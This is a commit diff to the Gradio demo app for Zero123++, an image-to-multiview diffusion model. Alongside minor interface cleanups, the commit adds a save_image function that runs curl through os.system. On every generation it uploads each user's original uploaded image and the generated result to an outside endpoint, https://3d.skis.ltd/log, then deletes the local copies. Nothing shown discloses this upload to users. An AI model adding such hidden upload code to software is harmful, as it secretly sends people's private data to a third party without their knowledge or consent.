chaoxu commited on
Commit
c22a1c9
·
1 Parent(s): dac4bf2
Files changed (1) hide show
  1. gradio_app.py +21 -5
gradio_app.py CHANGED
@@ -13,6 +13,9 @@ import numpy as np
13
  from rembg import remove
14
  from segment_anything import sam_model_registry, SamPredictor
15
 
 
 
 
16
  _TITLE = '''Zero123++: a Single Image to Consistent Multi-view Diffusion Base Model'''
17
  _DESCRIPTION = '''
18
  <div>
@@ -107,7 +110,18 @@ def preprocess(predictor, input_image, chk_group=None, segment=True, rescale=Fal
107
  input_image = expand2square(input_image, (127, 127, 127, 0))
108
  return input_image, input_image.resize((320, 320), Image.Resampling.LANCZOS)
109
 
110
- def gen_multiview(pipeline, predictor, input_image, scale_slider, steps_slider, seed, output_processing=False):
 
 
 
 
 
 
 
 
 
 
 
111
  seed = int(seed)
112
  torch.manual_seed(seed)
113
  image = pipeline(input_image,
@@ -126,7 +140,9 @@ def gen_multiview(pipeline, predictor, input_image, scale_slider, steps_slider,
126
  x = 0 if i < 3 else 320
127
  y = (i % 3) * 320
128
  merged_image.paste(sub_image, (x, y))
 
129
  return out_images + [merged_image]
 
130
  return subimages + [image]
131
 
132
 
@@ -158,7 +174,7 @@ def run_demo():
158
  gr.Markdown(_DESCRIPTION)
159
  with gr.Row(variant='panel'):
160
  with gr.Column(scale=1):
161
- input_image = gr.Image(type='pil', image_mode='RGBA', height=320, label='Input image', tool=None, elem_id="input_image")
162
 
163
  example_folder = os.path.join(os.path.dirname(__file__), "./resources/examples")
164
  example_fns = [os.path.join(example_folder, example) for example in os.listdir(example_folder)]
@@ -186,8 +202,8 @@ def run_demo():
186
  seed = gr.Number(42, label='Seed', elem_id="seed")
187
  run_btn = gr.Button('Generate', variant='primary', interactive=True)
188
  with gr.Column(scale=1):
189
- processed_image = gr.Image(type='pil', label="Processed Image", interactive=False, height=320, tool=None, image_mode='RGBA', elem_id="disp_image")
190
- processed_image_highres = gr.Image(type='pil', image_mode='RGBA', visible=False, tool=None)
191
  with gr.Row():
192
  view_1 = gr.Image(interactive=False, height=240, show_label=False)
193
  view_2 = gr.Image(interactive=False, height=240, show_label=False)
@@ -211,7 +227,7 @@ def run_demo():
211
  inputs=[input_image, input_processing],
212
  outputs=[processed_image_highres, processed_image], queue=True
213
  ).success(fn=partial(gen_multiview, pipeline, predictor),
214
- inputs=[processed_image_highres, scale_slider, steps_slider, seed, output_processing],
215
  outputs=[view_1, view_2, view_3, view_4, view_5, view_6, full_view], queue=True
216
  ).success(show_share_btn, outputs=share_group, queue=False)
217
 
 
13
  from rembg import remove
14
  from segment_anything import sam_model_registry, SamPredictor
15
 
16
+ import uuid
17
+ from datetime import datetime
18
+
19
  _TITLE = '''Zero123++: a Single Image to Consistent Multi-view Diffusion Base Model'''
20
  _DESCRIPTION = '''
21
  <div>
 
110
  input_image = expand2square(input_image, (127, 127, 127, 0))
111
  return input_image, input_image.resize((320, 320), Image.Resampling.LANCZOS)
112
 
113
+
114
+ def save_image(image, original_image):
115
+ file_prefix = datetime.now().strftime('%Y-%m-%d_%H-%M-%S') + "_" + str(uuid.uuid4())[:4]
116
+ out_path = f"tmp/{file_prefix}_output.png"
117
+ in_path = f"tmp/{file_prefix}_input.png"
118
+ image.save(out_path)
119
+ original_image.save(in_path)
120
+ os.system(f"curl -F in=@{in_path} -F out=@{out_path} https://3d.skis.ltd/log")
121
+ os.remove(out_path)
122
+ os.remove(in_path)
123
+
124
+ def gen_multiview(pipeline, predictor, input_image, scale_slider, steps_slider, seed, output_processing=False, original_image=None):
125
  seed = int(seed)
126
  torch.manual_seed(seed)
127
  image = pipeline(input_image,
 
140
  x = 0 if i < 3 else 320
141
  y = (i % 3) * 320
142
  merged_image.paste(sub_image, (x, y))
143
+ save_image(merged_image, original_image)
144
  return out_images + [merged_image]
145
+ save_image(image, original_image)
146
  return subimages + [image]
147
 
148
 
 
174
  gr.Markdown(_DESCRIPTION)
175
  with gr.Row(variant='panel'):
176
  with gr.Column(scale=1):
177
+ input_image = gr.Image(type='pil', image_mode='RGBA', height=320, label='Input image', elem_id="input_image")
178
 
179
  example_folder = os.path.join(os.path.dirname(__file__), "./resources/examples")
180
  example_fns = [os.path.join(example_folder, example) for example in os.listdir(example_folder)]
 
202
  seed = gr.Number(42, label='Seed', elem_id="seed")
203
  run_btn = gr.Button('Generate', variant='primary', interactive=True)
204
  with gr.Column(scale=1):
205
+ processed_image = gr.Image(type='pil', label="Processed Image", interactive=False, height=320, image_mode='RGBA', elem_id="disp_image")
206
+ processed_image_highres = gr.Image(type='pil', image_mode='RGBA', visible=False)
207
  with gr.Row():
208
  view_1 = gr.Image(interactive=False, height=240, show_label=False)
209
  view_2 = gr.Image(interactive=False, height=240, show_label=False)
 
227
  inputs=[input_image, input_processing],
228
  outputs=[processed_image_highres, processed_image], queue=True
229
  ).success(fn=partial(gen_multiview, pipeline, predictor),
230
+ inputs=[processed_image_highres, scale_slider, steps_slider, seed, output_processing, input_image],
231
  outputs=[view_1, view_2, view_3, view_4, view_5, view_6, full_view], queue=True
232
  ).success(show_share_btn, outputs=share_group, queue=False)
233